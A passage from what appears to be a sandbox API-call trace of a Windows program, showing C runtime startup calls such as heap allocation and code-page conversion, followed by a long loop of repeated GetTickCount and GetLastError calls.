hHeap=0x680000, dwFlags=0x0, lpMem=0x6811f8 | out: hHeap=0x680000) returned 1 [0113.680] GetModuleHandleA (lpModuleName="KERNEL32") returned 0x76d30000 [0113.680] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0113.681] IsProcessorFeaturePresent (ProcessorFeature=0x0) returned 0 [0113.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x800) returned 0x6811f8 [0113.682] GetLastError () returned 0x0 [0113.682] SetLastError (dwErrCode=0x0) [0113.682] GetLastError () returned 0x0 [0113.682] SetLastError (dwErrCode=0x0) [0113.682] GetLastError () returned 0x0 [0113.682] SetLastError (dwErrCode=0x0) [0113.682] GetACP () returned 0x4e4 [0113.682] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x220) returned 0x681a00 [0113.682] GetLastError () returned 0x0 [0113.682] SetLastError (dwErrCode=0x0) [0113.682] IsValidCodePage (CodePage=0x4e4) returned 1 [0113.683] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fe84 | out: lpCPInfo=0x18fe84) returned 1 [0113.683] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f950 | out: lpCPInfo=0x18f950) returned 1 [0113.683] GetLastError () returned 0x0 [0113.683] SetLastError (dwErrCode=0x0) [0113.683] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr="", cchSrc=1, lpCharType=0x18f8e0 | out: lpCharType=0x18f8e0) returned 1 [0113.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6c8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.683] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f964 | out: lpCharType=0x18f964) returned 1 [0113.683] GetLastError () returned 0x0 [0113.683] SetLastError (dwErrCode=0x0) [0113.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr="", cchSrc=1, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 1 [0113.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f698, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ觩跔@Ā") returned 256 [0113.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ觩跔@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ觩跔@Ā", cchSrc=256, lpDestStr=0x18f488, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0113.683] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchWideChar=256, lpMultiByteStr=0x18fc64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\\ÐK\x8c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0113.683] GetLastError () returned 0x0 [0113.683] SetLastError (dwErrCode=0x0) [0113.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0113.683] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ觩跔@Ā") returned 256 [0113.683] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ觩跔@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0113.684] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ觩跔@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0113.684] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\\ÐK\x8c\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0113.684] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x8, Size=0x80) returned 0x681c28 [0113.684] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40636c) returned 0x0 [0113.685] RtlSizeHeap (HeapHandle=0x680000, Flags=0x0, MemoryPointer=0x681c28) returned 0x80 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.685] GetLastError () returned 0x0 [0113.685] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.686] GetLastError () returned 0x0 [0113.686] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.687] GetLastError () returned 0x0 [0113.687] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.688] GetTickCount () returned 0x11507de [0113.688] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.689] GetLastError () returned 0x0 [0113.689] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.690] GetTickCount () returned 0x11507de [0113.690] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507de [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507de [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.691] GetLastError () returned 0x0 [0113.691] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.692] GetTickCount () returned 0x11507ed [0113.692] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 0x0 [0113.693] GetTickCount () returned 0x11507ed [0113.693] GetLastError () returned 